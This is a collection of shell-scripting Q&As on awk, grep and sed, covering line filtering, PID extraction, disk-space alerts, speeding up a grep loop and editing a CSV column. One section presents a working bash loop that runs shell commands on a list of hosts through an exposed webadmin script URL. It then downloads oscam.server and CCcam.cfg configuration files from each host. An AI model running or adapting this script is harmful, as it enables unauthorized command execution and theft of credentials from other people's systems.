Join conditions in awk - shell

How can I join this command
top -b -n 5 -d.2 | grep "Cpu" | awk 'NR==3{ print($2)}'
into a single awk command (merging grep and awk into one)?
I have tried this but with no success:
top -b -n 5 -d.2 | awk '{if( $1 == "Cpu(s):" && NR==3 ){ print($2)} }'
or
top -b -n 5 -d.2 | awk '{$1 ~ /Cpu/ && (NR==3) { print($2)}}'

awk '/Cpu/ {x++; if(x==3) { print $2}}'
Note: you can add exit for short-circuiting.
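The attempts in the question fail because NR counts every line awk reads, not only the lines that match. After grep, awk only ever saw the Cpu lines, so NR==3 meant the third match. A minimal sketch of the counter approach with exit added follows; third_cpu is a hypothetical name and the printf lines are made-up stand-ins for top output.

```shell
# third_cpu: print field 2 of the third line containing "Cpu", then stop reading.
third_cpu() {
  awk '/Cpu/ && ++n == 3 { print $2; exit }'
}

# Sample input standing in for: top -b -n 5 -d.2
printf '%s\n' \
  'top - 10:00:00 up 1 day' \
  'Cpu(s): 1.0 us' \
  'Mem: 1000 total' \
  'Cpu(s): 2.0 us' \
  'Cpu(s): 3.0 us' \
  'Cpu(s): 4.0 us' | third_cpu
```

With real data this would be used as top -b -n 5 -d.2 | third_cpu.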

top -b -n 5 -d.2 | awk '/Cpu/ { if (++cnt==3) print $2 }'

Related

How to grep first match and second match(ignore first match) with awk or sed or grep?

> root# ps -ef | grep [j]ava | awk '{print $2,$9}'
> 45134 -Dapex=APEC
> 45135 -Dapex=JAAA
> 45136 -Dapex=APEC
I need the PID from the first APEC line as First PID, the PID from the third line (the second APEC) as Second PID, and the remaining one as Third PID.
I've tried awk but did not get the expected result.
> First_PID =ps -ef | grep [j]ava | awk '{print $2,$9}'|awk '{if ($0 == "[^0-9]" || $1 == "APEC:") {print $0; exit;}}'
Expected result should look like this.
> First_PID=45134
> Second_PID=45136
> Third_PID=45135
With your shown samples, please try the following awk code, written and tested in GNU awk.
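ps -ef | grep '[j]ava' |
awk '
{
# collect the "PID option" pair of every line into one string
val = (val ? val OFS : "") $2 OFS $9
}
END {
# the third argument of match() (capture array) is a GNU awk extension
if (match(val, /([0-9]+) -Dapex=APEC ([0-9]+) -Dapex=JAAA\s([0-9]+)/, arr))
print "First_PID=" arr[1], "Second_PID=" arr[3], "Third_PID=" arr[2]
}
'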
How about this:
$ input=("1 APEC" "2 JAAA" "3 APEC")
$ printf '%s\n' "${input[@]}" | grep APEC | sed -n '2p'
3 APEC
Explanation:
input=(...) - input data in an array, for testing
printf '%s\n' "${input[@]}" - print input array, one element per line
grep APEC - keep lines containing APEC only
sed -n - run sed without automatic print
sed -n '2p' - print only the second line
If you just want the APECs first...
ps -ef |
awk '/java[ ].* -Dapex=APEC/{print $2" "$9; next; }
/java[ ]/{non[NR]=$2" "$9}
END{ for (rec in non) print non[rec] }'
If possible, use an array instead of those ordinally named vars.
mapfile -t pids < <( ps -ef | awk '/java[ ].* -Dapex=APEC/{print $2; next; }
/java[ ]/{non[NR]=$2} END{ for (rec in non) print non[rec] }' )
After reading everyone's ideas, I ended up with a very simple solution.
FIRST_PID=$(ps -ef | grep APEC | grep -v grep | awk '{print $2}'| sed -n '1p')
SECOND_PID=$(ps -ef | grep APEC | grep -v grep | awk '{print $2}'| sed -n '2p')
JAWS_PID=$(ps -ef | grep JAAA | grep -v grep | awk '{print $2}')
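The three pipelines above each run ps again. As a sketch only, the same values can be collected in one awk pass; pids_by_tag is a hypothetical helper, and it assumes input lines of the form "PID option" as in the sample from the question.

```shell
# pids_by_tag: read "PID option" lines on stdin and print the three assignments.
pids_by_tag() {
  awk '
    $2 ~ /APEC/ { apec[++n] = $1 }   # remember APEC PIDs in order of appearance
    $2 ~ /JAAA/ { jaaa = $1 }        # remember the JAAA PID
    END {
      print "First_PID=" apec[1]
      print "Second_PID=" apec[2]
      print "Third_PID=" jaaa
    }'
}

# Sample lines from the question stand in for the ps output.
printf '%s\n' \
  '45134 -Dapex=APEC' \
  '45135 -Dapex=JAAA' \
  '45136 -Dapex=APEC' | pids_by_tag
```

On a live system the input would come from something like ps -ef | awk '/[j]ava/ {print $2, $9}' | pids_by_tag.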

`df' unexpected' checking for diskspace inside a function using a while loop bash script

When I call the function below, I get the error: line 89: syntax error at line 117: 'df' unexpected.
If I take the code out of the function it works fine.
Is there any reason for the error above?
This is a bash script on RHEL.
function testr{
df -H | grep -vE '^Filesystem|tmpfs|cdrom' | awk '{ print $5 " " $1 }' | while read output;
do
usep=$(echo $output | awk '{ print $1}' | cut -d'%' -f1)
partition=$(echo $output | awk '{ print $2 }')
(.. Sends alert via mail after)
done
}
Maybe a little easier to read this way?
testr_zsh () {
# This (only) works with zsh.
for usep partition in $( df -H | awk 'NR>1 && !/tmpfs|cdrom/{print $5,$1}' | sed -n '/%/s/%//p' )
do
echo "\$usep: $usep, \$partition: $partition"
done
}
testr () {
for fs in $( df -H | awk 'NR>1 && !/tmpfs|cdrom/{print $5"|"$1}' | sed -n '/%/s/%//p' )
do
usep="$(echo "${fs}" | sed 's/|.*//' )"
partition="$(echo "${fs}" | sed 's/.*|//' )"
echo "\$usep: $usep, \$partition: $partition"
done
}
On my computer, not all lines that pass through the awk filter have % in them, hence the added sed filter. zsh allows two variables in the for loop, which is pretty slick.
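For bash itself, a minimal sketch follows. It assumes the syntax error most likely comes from function testr{, where the missing space before { makes the shell read testr{ as the function name and then choke on df. report_usage is a hypothetical name, and the function reads df-style text on stdin so it can be tried on sample input.

```shell
# report_usage: read df-style output on stdin, print usage percent and filesystem.
# Note the space and parentheses in the definition: "report_usage() {".
report_usage() {
  awk 'NR > 1 && !/tmpfs|cdrom/ && $5 ~ /%$/ { sub(/%$/, "", $5); print $5, $1 }' |
  while read -r usep partition; do
    # The mail alert from the question would go here.
    echo "usep: $usep, partition: $partition"
  done
}

# Made-up sample standing in for: df -H
printf '%s\n' \
  'Filesystem Size Used Avail Use% Mounted on' \
  '/dev/sda1 50G 20G 30G 40% /' \
  'tmpfs 2G 0 2G 0% /dev/shm' | report_usage
```

Letting read split the two fields avoids the extra echo, awk, and cut calls inside the loop.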

One liner working, but in bash script not working, why?

oneliner
curl "127.0.0.1:81/webadmin/script?command=|ps%20-T%20-f" | grep oscam | awk 'BEGIN{IGNORECASE=1;oscam;RS="<br>"}; {print $11};' | awk '{print "/file?file="$0"/oscam.server"}' | awk '!x[$0]++'
and bash style
#!/bin/sh
OSCAM="/webadmin/script?command=|ps%20-T%20-f" | grep oscam | awk 'BEGIN{IGNORECASE=1;oscam;RS="<br>"}; {print $11};' | awk '{print "/file?file="$0"/oscam.server"}' | awk '!x[$0]++' > oscam.source.tmp
URL2=$(cat oscam.source.tmp)
for URL in `cat links.md`; do echo $URL; curl -m 5 $1 "$URL$OSCAM" > oscam.source; curl -m 5 $1 "$URL$URL2"
done > oscam.server.new
The main problem is that the script does not run as expected: it produces no output in oscam.source.tmp.
OK, I refined the script and it finally works :)
#!/bin/bash
for URL in $(< links.md); do echo curl -L -m 5 $1 "'"$URL"/webadmin/script?command=|find%20/etc%20/var%20/usr%20|%20egrep%20%22CCcam.cfg|oscam.server%22'" | bash - | egrep "oscam.server<br>|CCcam.cfg" | awk 'BEGIN{RS="<br>"} {print $1}' > oscam.source.bak && awk '!/^$/' oscam.source.bak | awk '$0="/file?file="$0' > oscam.temp;
for URL2 in $(< oscam.temp); do echo curl -L -m 5 $1 "$URL$URL2" | bash -
done
done > oscam.server.new
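As a side note on why the first script wrote nothing to oscam.source.tmp: its OSCAM line pipes a plain variable assignment into grep and never calls curl, and an assignment prints nothing. The sketch below shows the difference with a stand-in pipeline; the variable names are hypothetical, and printf and tr replace the curl, grep, and awk steps so the example runs offline.

```shell
# A bare assignment writes nothing to stdout, so the pipeline after it gets no input.
empty=$(PATH_PART="/webadmin/script" | tr 'a-z' 'A-Z')

# Command substitution captures the output of the whole pipeline instead.
# printf stands in for the curl call of the one-liner.
filled=$(printf '%s\n' "/webadmin/script" | tr 'a-z' 'A-Z')

echo "empty=[$empty] filled=[$filled]"
```

In the script, the same idea would mean running curl inside $( ... ) and assigning the result, rather than piping the assignment itself.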

Bash Grep Takes 3 Days To Run. Anyway to Enhance it?

I have a script like the one below and would like suggestions on how to speed it up.
cd /home/output/
cat R*op.txt > R.total.op.txt
awk '{if( (length($8)>9) || ($8 ~ /^AAA/) ) {print $0}}' R.total.op.txt > temp && mv temp R.total.op.txt
cat S*op.txt > S.total.op.txt
awk '{if( (length($8)>9) || ($8 ~ /^AAA/) ) {print $0}}' S.total.op.txt > temp && mv temp S.total.op.txt
cat R.total.op.txt S.total.op.txt | awk '{print $4}' | sort -k1,1 | awk '!x[$1]++' > genes.txt
rm *total.op.txt
head genes.txt
cd /home/output/
for j in R1_with-genename R2_with-genename S1_with-genename S2_with-genename
do
**for i in `cat genes.txt`; do cat $j'.op.txt' | grep -w $i >> $j'_'$i'_gene.txt'**;done
done
ls -m1 *gene.txt | wc -l
find . -size 0 -delete
ls -m1 *gene.txt | wc -l
rm genes.txt
cd /home/output/
for i in `ls *gene.txt`
do
paste <(awk '{print $4"\t"$8"\t"$9"\t"$13}' $i | awk '!x[$1]++' | awk '{print $1}') <(awk '{print $4"\t"$8"\t"$9}' $i | awk '{if( (length($2)>9) || ($2 ~ /^AAA/) ) {print $0}}' | sort -k2,2 | awk '{ sum += $3 } END { if (NR > 0) print sum / NR }') <(awk '{print $4"\t"$8"\t"$9}' $i| awk '{if( (length($2)>9) || ($2 ~ /^AAA/) ) {print $0}}' | sort -k2,2 | wc -l) <(awk '{print $4"\t"$8"\t"$9"\t"$13}' $i | awk '{if( (length($2)>9) || ($2 ~ /^AAA/) ) {print $0}}' | sort -k2,2 | grep -v ":::" | wc -l) > $i'_stats.txt'
done
rm *gene.txt
cd /home/output/
for j in R1_with-genename R2_with-genename S1_with-genename S2_with-genename
do
cat $j*stats.txt > $j'.final.txt'
done
rm *stats.txt
cd /home/output/
for i in `ls *final.txt`
do
sed "1iGene_Name\tMean1\tCalculated\tbases" $i > temp && mv temp $i
done
head *final.txt
The very first for loop (marked with asterisks), the one that has cat genes.txt, is the grep loop that takes 3 days to finish. Can someone please suggest any enhancements to the command, and say whether this entire script can be made into a single command? Thanks in advance.
Try replacing the nested loops with a single awk.
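awk 'FNR == NR { words[$0] = "\\<" $0 "\\>"; next }  # genes.txt: one word-bounded regex per gene (GNU awk syntax)
FNR == 1 { base = FILENAME; sub(/\.op\.txt$/, "", base) }  # strip the suffix to match the original output names
{ for (i in words) if ($0 ~ words[i]) {
fn = base "_" i "_gene.txt";
print >> fn;
close(fn);
}
}' genes.txt {R,S}{1,2}_with-genename.op.txt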
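If the gene name only needs to match column 4 exactly (an assumption, based on genes.txt being built from $4 in the question, and not the same as grep -w over the whole line), a hash lookup avoids testing every regex against every line. A hedged sketch, with split_by_gene as a hypothetical name and made-up sample data:

```shell
# split_by_gene GENES FILE...: append each line of FILE whose 4th field is
# listed in GENES to <basename>_<gene>_gene.txt.
split_by_gene() {
  awk 'FNR == NR { want[$1]; next }                           # load gene names
       FNR == 1  { base = FILENAME; sub(/\.op\.txt$/, "", base) }
       $4 in want { fn = base "_" $4 "_gene.txt"; print >> fn; close(fn) }' "$@"
}

# Small demo in a scratch directory.
tmp=$(mktemp -d) && cd "$tmp" || exit 1
printf '%s\n' 'a b c geneA x' 'a b c geneB x' 'a b c geneA y' > R1_with-genename.op.txt
printf '%s\n' geneA geneB > genes.txt
split_by_gene genes.txt R1_with-genename.op.txt
cat R1_with-genename_geneA_gene.txt
```

Closing the file after every write keeps the number of open files low at the cost of some speed; with only a few genes the close(fn) call could be dropped.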
I suggest creating a sed script:
# name script
SEDSCRIPT=split.sed
# Make sure it is empty
echo "" > ${SEDSCRIPT}
# Loop through all the words in genes.txt and
# create sed command that will write that line to a file
for word in `cat genes.txt`; do
echo "/${word}/w ${word}.txt" >> ${SEDSCRIPT}
done
basenames="R1_with-genename R2_with-genename S1_with-genename S2_with-genename"
# Loop over input files
for name in ${basenames}; do
# Run sed script against file
sed -n -f ${SEDSCRIPT} ${name}.op.txt
# Move the temporary files created by sed to their permanent names
for word in `cat genes.txt`; do
mv ${word}.txt ${name}_${word}_gene.txt
done
done

awk append in CSV file

How can I use awk to append 000 to the timestamp column below? I tried the following command,
head -n 10000001 ratings.csv | tail -n +2 | awk '{print $1 "000"}' >> ratings_1.csv
but the output is not what I expected.
$ cat ratings.csv |wc -l
20000264
$ head ratings.csv
userId,movieId,rating,timestamp
1,2,3.5,1112486027
1,29,3.5,1112484676
1,32,3.5,1112484819
1,47,3.5,1112484727
1,50,3.5,1112484580
1,112,3.5,1094785740
1,151,4.0,1094785734
1,223,4.0,1112485573
1,253,4.0,1112484940
My expected output should look like
1,2,3.5,1112486027000
awk '{ if (NR > 1) { $1 = $1 "000" } print }'
Maybe a faster version that wouldn't run the if on every line would be:
awk 'BEGIN { getline; print } { print $0 "000" }'
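Both commands above work because, with the default whitespace separator, the whole CSV line is a single field. A sketch that addresses the timestamp column explicitly follows; append_ms is a hypothetical name, and it assumes the timestamp is always the fourth comma-separated field and that no field contains a quoted comma.

```shell
# append_ms: append "000" to the 4th CSV field of every line except the header.
append_ms() {
  awk 'BEGIN { FS = OFS = "," } NR > 1 { $4 = $4 "000" } { print }'
}

# First lines of ratings.csv from the question as sample input.
printf '%s\n' \
  'userId,movieId,rating,timestamp' \
  '1,2,3.5,1112486027' \
  '1,29,3.5,1112484676' | append_ms
```

For the real file this would be run as append_ms < ratings.csv > ratings_1.csv.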

Resources